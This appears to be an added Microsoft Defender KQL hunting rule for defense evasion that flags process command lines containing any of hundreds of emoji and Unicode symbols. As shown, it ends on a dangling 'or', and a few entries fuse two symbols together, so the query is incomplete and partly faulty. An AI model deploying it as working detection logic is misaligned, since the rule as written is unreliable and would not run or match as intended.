+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🔸" or ProcessCommandLine contains "🔹" or ProcessCommandLine contains "🔶" or ProcessCommandLine contains "🔷" or ProcessCommandLine contains "🔳" or ProcessCommandLine contains "🔲" or ProcessCommandLine contains "▪️" or ProcessCommandLine contains "▫️" or ProcessCommandLine contains "◾️" or ProcessCommandLine contains "◽️" or ProcessCommandLine contains "◼️" or ProcessCommandLine contains "◻️" or ProcessCommandLine contains "🟥" or ProcessCommandLine contains "🟧" or ProcessCommandLine contains "🟨" or ProcessCommandLine contains "🟩" or ProcessCommandLine contains "🟦" or ProcessCommandLine contains "🟪" or ProcessCommandLine contains "⬛️" or ProcessCommandLine contains "⬜️" or ProcessCommandLine contains "🟫" or ProcessCommandLine contains "🔈" or ProcessCommandLine contains "🔇" or ProcessCommandLine contains "🔉" or ProcessCommandLine contains "🔊" or ProcessCommandLine contains "🔔" or ProcessCommandLine contains "🔕" or ProcessCommandLine contains "📣" or ProcessCommandLine contains "📢" or ProcessCommandLine contains "👁‍🗨" or ProcessCommandLine contains "💬" or ProcessCommandLine contains "💭" or ProcessCommandLine contains "🗯" or ProcessCommandLine contains "♠️" or ProcessCommandLine contains "♣️" or ProcessCommandLine contains "♥️" or ProcessCommandLine contains "♦️" or ProcessCommandLine contains "🃏" or ProcessCommandLine contains "🎴" or ProcessCommandLine contains "🀄️" or ProcessCommandLine contains "🕐" or ProcessCommandLine contains "🕑" or ProcessCommandLine contains "🕒" or ProcessCommandLine contains "🕓" or ProcessCommandLine contains "🕔" or
ProcessCommandLine contains "🕕" or ProcessCommandLine contains "🕖" or ProcessCommandLine contains "🕗" or ProcessCommandLine contains "🕘" or ProcessCommandLine contains "🕙" or ProcessCommandLine contains "🕚" or ProcessCommandLine contains "🕛" or ProcessCommandLine contains "🕜" or ProcessCommandLine contains "🕝" or ProcessCommandLine contains "🕞" or ProcessCommandLine contains "🕟" or ProcessCommandLine contains "🕠" or ProcessCommandLine contains "🕡" or ProcessCommandLine contains "🕢" or ProcessCommandLine contains "🕣" or ProcessCommandLine contains "🕤" or ProcessCommandLine contains "🕥" or ProcessCommandLine contains "🕦" or ProcessCommandLine contains "🕧✢" or ProcessCommandLine contains "✣" or ProcessCommandLine contains "✤" or ProcessCommandLine contains "✥" or ProcessCommandLine contains "✦" or ProcessCommandLine contains "✧" or ProcessCommandLine contains "★" or ProcessCommandLine contains "☆" or ProcessCommandLine contains "✯" or ProcessCommandLine contains "✡︎" or ProcessCommandLine contains "✩" or ProcessCommandLine contains "✪" or ProcessCommandLine contains "✫" or ProcessCommandLine contains "✬" or ProcessCommandLine contains "✭" or ProcessCommandLine contains "✮" or ProcessCommandLine contains "✶" or ProcessCommandLine contains "✷" or ProcessCommandLine contains "✵" or ProcessCommandLine contains "✸" or ProcessCommandLine contains "✹" or ProcessCommandLine contains "→" or ProcessCommandLine contains "⇒" or ProcessCommandLine contains "⟹" or ProcessCommandLine contains "⇨" or ProcessCommandLine contains "⇾" or ProcessCommandLine contains "➾" or ProcessCommandLine contains "⇢" or ProcessCommandLine contains "☛" or ProcessCommandLine contains "☞" or ProcessCommandLine contains "➔" or ProcessCommandLine contains "➜" or ProcessCommandLine contains "➙" or ProcessCommandLine contains "➛" or ProcessCommandLine contains "➝" or ProcessCommandLine contains "➞" or ProcessCommandLine contains "♠︎" or ProcessCommandLine contains "♣︎" or ProcessCommandLine contains "♥︎" or 
ProcessCommandLine contains "♦︎" or ProcessCommandLine contains "♤" or ProcessCommandLine contains "♧" or ProcessCommandLine contains "♡" or ProcessCommandLine contains "♢" or ProcessCommandLine contains "♚" or ProcessCommandLine contains "♛" or ProcessCommandLine contains "♜" or ProcessCommandLine contains "♝" or ProcessCommandLine contains "♞" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "♔" or ProcessCommandLine contains "♕" or ProcessCommandLine contains "♖" or ProcessCommandLine contains "♗" or ProcessCommandLine contains "♘" or ProcessCommandLine contains "♙" or ProcessCommandLine contains "⚀" or ProcessCommandLine contains "⚁" or ProcessCommandLine contains "⚂" or ProcessCommandLine contains "⚃" or ProcessCommandLine contains "⚄" or ProcessCommandLine contains "⚅" or ProcessCommandLine contains "🂠" or ProcessCommandLine contains "⚈" or ProcessCommandLine contains "⚉" or ProcessCommandLine contains "⚆" or ProcessCommandLine contains "⚇" or ProcessCommandLine contains "𓀀" or ProcessCommandLine contains "𓀁" or ProcessCommandLine contains "𓀂" or ProcessCommandLine contains "𓀃" or ProcessCommandLine contains "𓀄" or ProcessCommandLine contains "𓀅" or ProcessCommandLine contains "𓀆" or ProcessCommandLine contains "𓀇" or ProcessCommandLine contains "𓀈" or ProcessCommandLine contains "𓀉" or ProcessCommandLine contains "𓀊" or ProcessCommandLine contains "𓀋" or ProcessCommandLine contains "𓀌" or ProcessCommandLine contains "𓀍" or ProcessCommandLine contains "𓀎" or ProcessCommandLine contains "𓀏" or ProcessCommandLine contains "𓀐" or ProcessCommandLine contains "𓀑" or ProcessCommandLine contains "𓀒" or ProcessCommandLine contains "𓀓" or ProcessCommandLine contains "𓀔" or ProcessCommandLine contains "𓀕" or ProcessCommandLine contains "𓀖" or ProcessCommandLine contains "𓀗" or ProcessCommandLine contains "𓀘" or ProcessCommandLine contains "𓀙" or ProcessCommandLine contains "𓀚" or ProcessCommandLine contains "𓀛" or ProcessCommandLine contains "𓀜" or 
ProcessCommandLine contains "𓀝🏳️" or ProcessCommandLine contains "🏴" or ProcessCommandLine contains "🏁" or ProcessCommandLine contains "🚩" or ProcessCommandLine contains "🏳️‍🌈" or ProcessCommandLine contains "🏳️‍⚧️" or ProcessCommandLine contains "🏴‍☠️" or ProcessCommandLine contains "🇦🇫" or ProcessCommandLine contains "🇦🇽" or ProcessCommandLine contains "🇦🇱" or ProcessCommandLine contains "🇩🇿" or ProcessCommandLine contains "🇦🇸" or ProcessCommandLine contains "🇦🇩" or ProcessCommandLine contains "🇦🇴" or ProcessCommandLine contains "🇦🇮" or ProcessCommandLine contains "🇦🇶" or ProcessCommandLine contains "🇦🇬" or ProcessCommandLine contains "🇦🇷" or ProcessCommandLine contains "🇦🇲" or ProcessCommandLine contains "🇦🇼" or ProcessCommandLine contains "🇦🇺" or ProcessCommandLine contains "🇦🇹" or ProcessCommandLine contains "🇦🇿" or ProcessCommandLine contains "🇧🇸" or ProcessCommandLine contains "🇧🇭" or ProcessCommandLine contains "🇧🇩" or ProcessCommandLine contains "🇧🇧" or ProcessCommandLine contains "🇧🇾" or ProcessCommandLine contains "🇧🇪" or ProcessCommandLine contains "🇧🇿" or ProcessCommandLine contains "🇧🇯" or ProcessCommandLine contains "🇧🇲" or ProcessCommandLine contains "🇧🇹" or ProcessCommandLine contains "🇧🇴" or ProcessCommandLine contains "🇧🇦" or ProcessCommandLine contains "🇧🇼" or ProcessCommandLine contains "🇧🇷" or ProcessCommandLine contains "🇮🇴" or ProcessCommandLine contains "🇻🇬" or ProcessCommandLine contains "🇧🇳" or ProcessCommandLine contains "🇧🇬" or ProcessCommandLine contains "🇧🇫" or ProcessCommandLine contains "🇧🇮" or ProcessCommandLine contains "🇰🇭" or ProcessCommandLine contains "🇨🇲" or ProcessCommandLine contains "🇨🇦" or ProcessCommandLine contains "🇮🇨" or ProcessCommandLine contains "🇨🇻" or ProcessCommandLine contains "🇧🇶" or ProcessCommandLine contains "🇰🇾" or ProcessCommandLine contains "🇨🇫" or ProcessCommandLine contains "🇹🇩" or ProcessCommandLine contains "🇨🇱" or ProcessCommandLine contains "🇨🇳" or ProcessCommandLine contains "🇨🇽" or 
ProcessCommandLine contains "🇨🇨" or ProcessCommandLine contains "🇨🇴" or ProcessCommandLine contains "🇰🇲" or ProcessCommandLine contains "🇨🇬" or ProcessCommandLine contains "🇨🇩" or ProcessCommandLine contains "🇨🇰" or ProcessCommandLine contains "🇨🇷" or ProcessCommandLine contains "🇨🇮" or ProcessCommandLine contains "🇭🇷" or ProcessCommandLine contains "🇨🇺" or ProcessCommandLine contains "🇨🇼" or ProcessCommandLine contains "🇨🇾" or ProcessCommandLine contains "🇨🇿" or ProcessCommandLine contains "🇩🇰" or ProcessCommandLine contains "🇩🇯" or ProcessCommandLine contains "🇩🇲" or ProcessCommandLine contains "🇩🇴" or ProcessCommandLine contains "🇪🇨" or ProcessCommandLine contains "🇪🇬" or ProcessCommandLine contains "🇸🇻" or ProcessCommandLine contains "🇬🇶" or ProcessCommandLine contains "🇪🇷" or ProcessCommandLine contains "🇪🇪" or ProcessCommandLine contains "🇪🇹" or ProcessCommandLine contains "🇪🇺" or ProcessCommandLine contains "🇫🇰" or ProcessCommandLine contains "🇫🇴" or ProcessCommandLine contains "🇫🇯" or ProcessCommandLine contains "🇫🇮" or ProcessCommandLine contains "🇫🇷" or ProcessCommandLine contains "🇬🇫" or ProcessCommandLine contains "🇵🇫" or ProcessCommandLine contains "🇹🇫" or ProcessCommandLine contains "🇬🇦" or ProcessCommandLine contains "🇬🇲" or ProcessCommandLine contains "🇬🇪" or ProcessCommandLine contains "🇩🇪" or ProcessCommandLine contains "🇬🇭" or ProcessCommandLine contains "🇬🇮" or ProcessCommandLine contains "🇬🇷" or ProcessCommandLine contains "🇬🇱" or ProcessCommandLine contains "🇬🇩" or ProcessCommandLine contains "🇬🇵" or ProcessCommandLine contains "🇬🇺" or ProcessCommandLine contains "🇬🇹" or ProcessCommandLine contains "🇬🇬" or ProcessCommandLine contains "🇬🇳" or ProcessCommandLine contains "🇬🇼" or ProcessCommandLine contains "🇬🇾" or ProcessCommandLine contains "🇭🇹" or ProcessCommandLine contains "🇭🇳" or ProcessCommandLine contains "🇭🇰" or ProcessCommandLine contains "🇭🇺" or ProcessCommandLine contains "🇮🇸" or ProcessCommandLine contains "🇮🇳" or ProcessCommandLine 
contains "🇮🇩" or ProcessCommandLine contains "🇮🇷" or ProcessCommandLine contains "🇮🇶" or ProcessCommandLine contains "🇮🇪" or ProcessCommandLine contains "🇮🇲" or ProcessCommandLine contains "🇮🇱" or ProcessCommandLine contains "🇮🇹" or ProcessCommandLine contains "🇯🇲" or ProcessCommandLine contains "🇯🇵" or ProcessCommandLine contains "🎌" or ProcessCommandLine contains "🇯🇪" or ProcessCommandLine contains "🇯🇴" or ProcessCommandLine contains "🇰🇿" or ProcessCommandLine contains "🇰🇪" or ProcessCommandLine contains "🇰🇮" or ProcessCommandLine contains "🇽🇰" or ProcessCommandLine contains "🇰🇼" or ProcessCommandLine contains "🇰🇬" or ProcessCommandLine contains "🇱🇦" or ProcessCommandLine contains "🇱🇻" or ProcessCommandLine contains "🇱🇧" or ProcessCommandLine contains "🇱🇸" or ProcessCommandLine contains "🇱🇷" or ProcessCommandLine contains "🇱🇾" or ProcessCommandLine contains "🇱🇮" or ProcessCommandLine contains "🇱🇹" or ProcessCommandLine contains "🇱🇺" or ProcessCommandLine contains "🇲🇴" or ProcessCommandLine contains "🇲🇰" or ProcessCommandLine contains "🇲🇬" or ProcessCommandLine contains "🇲🇼" or ProcessCommandLine contains "🇲🇾" or ProcessCommandLine contains "🇲🇻" or ProcessCommandLine contains "🇲🇱" or ProcessCommandLine contains "🇲🇹" or ProcessCommandLine contains "🇲🇭" or ProcessCommandLine contains "🇲🇶" or ProcessCommandLine contains "🇲🇷" or ProcessCommandLine contains "🇲🇺" or ProcessCommandLine contains "🇾🇹" or ProcessCommandLine contains "🇲🇽" or ProcessCommandLine contains "🇫🇲" or ProcessCommandLine contains "🇲🇩" or ProcessCommandLine contains "🇲🇨" or ProcessCommandLine contains "🇲🇳" or ProcessCommandLine contains "🇲🇪" or ProcessCommandLine contains "🇲🇸" or ProcessCommandLine contains "🇲🇦" or ProcessCommandLine contains "🇲🇿" or ProcessCommandLine contains "🇲🇲" or ProcessCommandLine contains "🇳🇦" or ProcessCommandLine contains "🇳🇷" or ProcessCommandLine contains "🇳🇵" or ProcessCommandLine contains "🇳🇱" or ProcessCommandLine contains "🇳🇨" or ProcessCommandLine contains "🇳🇿" or 
ProcessCommandLine contains "🇳🇮" or ProcessCommandLine contains "🇳🇪" or ProcessCommandLine contains "🇳🇬" or ProcessCommandLine contains "🇳🇺" or ProcessCommandLine contains "🇳🇫" or ProcessCommandLine contains "🇰🇵" or ProcessCommandLine contains "🇲🇵" or ProcessCommandLine contains "🇳🇴" or ProcessCommandLine contains "🇴🇲" or ProcessCommandLine contains "🇵🇰" or ProcessCommandLine contains "🇵🇼" or ProcessCommandLine contains "🇵🇸" or ProcessCommandLine contains "🇵🇦" or ProcessCommandLine contains "🇵🇬" or ProcessCommandLine contains "🇵🇾" or ProcessCommandLine contains "🇵🇪" or ProcessCommandLine contains "🇵🇭" or ProcessCommandLine contains "🇵🇳" or ProcessCommandLine contains "🇵🇱" or ProcessCommandLine contains "🇵🇹" or ProcessCommandLine contains "🇵🇷" or ProcessCommandLine contains "🇶🇦" or ProcessCommandLine contains "🇷🇪" or ProcessCommandLine contains "🇷🇴" or ProcessCommandLine contains "🇷🇺" or ProcessCommandLine contains "🇷🇼" or ProcessCommandLine contains "🇼🇸" or ProcessCommandLine contains "🇸🇲" or ProcessCommandLine contains "🇸🇦" or ProcessCommandLine contains "🇸🇳" or ProcessCommandLine contains "🇷🇸" or ProcessCommandLine contains "🇸🇨" or ProcessCommandLine contains "🇸🇱" or ProcessCommandLine contains "🇸🇬" or ProcessCommandLine contains "🇸🇽" or ProcessCommandLine contains "🇸🇰" or ProcessCommandLine contains "🇸🇮" or ProcessCommandLine contains "🇬🇸" or ProcessCommandLine contains "🇸🇧" or ProcessCommandLine contains "🇸🇴" or ProcessCommandLine contains "🇿🇦" or ProcessCommandLine contains "🇰🇷" or ProcessCommandLine contains "🇸🇸" or ProcessCommandLine contains "🇪🇸" or ProcessCommandLine contains "🇱🇰" or ProcessCommandLine contains "🇧🇱" or ProcessCommandLine contains "🇸🇭" or ProcessCommandLine contains "🇰🇳" or ProcessCommandLine contains "🇱🇨" or ProcessCommandLine contains "🇵🇲" or ProcessCommandLine contains "🇻🇨" or ProcessCommandLine contains "🇸🇩" or ProcessCommandLine contains "🇸🇷" or ProcessCommandLine contains "🇸🇿" or ProcessCommandLine contains "🇸🇪" or ProcessCommandLine 
contains "🇨🇭" or ProcessCommandLine contains "🇸🇾" or ProcessCommandLine contains "🇹🇼" or ProcessCommandLine contains "🇹🇯" or ProcessCommandLine contains "🇹🇿" or ProcessCommandLine contains "🇹🇭" or ProcessCommandLine contains "🇹🇱" or ProcessCommandLine contains "🇹🇬" or ProcessCommandLine contains "🇹🇰" or ProcessCommandLine contains "🇹🇴" or ProcessCommandLine contains "🇹🇹" or ProcessCommandLine contains "🇹🇳" or ProcessCommandLine contains "🇹🇷" or ProcessCommandLine contains "🇹🇲" or ProcessCommandLine contains "🇹🇨" or ProcessCommandLine contains "🇹🇻" or ProcessCommandLine contains "🇻🇮" or ProcessCommandLine contains "🇺🇬" or ProcessCommandLine contains "🇺🇦" or ProcessCommandLine contains "🇦🇪" or ProcessCommandLine contains "🇬🇧" or ProcessCommandLine contains "🏴󠁧󠁢󠁥󠁮󠁧󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁳󠁣󠁴󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁷󠁬󠁳󠁿" or ProcessCommandLine contains "🇺🇳" or ProcessCommandLine contains "🇺🇸" or ProcessCommandLine contains "🇺🇾" or ProcessCommandLine contains "🇺🇿" or ProcessCommandLine contains "🇻🇺" or ProcessCommandLine contains "🇻🇦" or ProcessCommandLine contains "🇻🇪" or ProcessCommandLine contains "🇻🇳" or ProcessCommandLine contains "🇼🇫" or ProcessCommandLine contains "🇪🇭" or ProcessCommandLine contains "🇾🇪" or ProcessCommandLine contains "🇿🇲" or ProcessCommandLine contains "🇿🇼🫠" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🫤" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains 
"🫳" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🤝🏻" or ProcessCommandLine contains "🤝🏼" or ProcessCommandLine contains "🤝🏽" or ProcessCommandLine contains "🤝🏾" or ProcessCommandLine contains "🤝🏿" or ProcessCommandLine contains "🫱🏻‍🫲🏼" or ProcessCommandLine contains "🫱🏻‍🫲🏽" or ProcessCommandLine contains "🫱🏻‍🫲🏾" or ProcessCommandLine contains "🫱🏻‍🫲🏿" or ProcessCommandLine contains "🫱🏼‍🫲🏻" or ProcessCommandLine contains "🫱🏼‍🫲🏽" or ProcessCommandLine contains "🫱🏼‍🫲🏾" or ProcessCommandLine contains "🫱🏼‍🫲🏿" or ProcessCommandLine contains "🫱🏽‍🫲🏻" or ProcessCommandLine contains "🫱🏽‍🫲🏼" or ProcessCommandLine contains "🫱🏽‍🫲🏾" or ProcessCommandLine contains "🫱🏽‍🫲🏿" or ProcessCommandLine contains "🫱🏾‍🫲🏻" or ProcessCommandLine contains "🫱🏾‍🫲🏼" or ProcessCommandLine contains "🫱🏾‍🫲🏽" or ProcessCommandLine contains "🫱🏾‍🫲🏿" or ProcessCommandLine contains "🫱🏿‍🫲🏻" or ProcessCommandLine contains "🫱🏿‍🫲🏼" or ProcessCommandLine contains "🫱🏿‍🫲🏽" or ProcessCommandLine contains 
"🫱🏿‍🫲🏾" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains 
"🧔🏿‍♂️" or ProcessCommandLine contains "💑🏻" or ProcessCommandLine contains "💑🏼" or ProcessCommandLine contains "💑🏽" or ProcessCommandLine contains "💑🏾" or ProcessCommandLine contains "💑🏿" or ProcessCommandLine contains "💏🏻" or ProcessCommandLine contains "💏🏼" or ProcessCommandLine contains "💏🏽" or ProcessCommandLine contains "💏🏾" or ProcessCommandLine contains "💏🏿" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏽" or ProcessCommandLine contains 
"👩🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏾" or 
ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏽" or 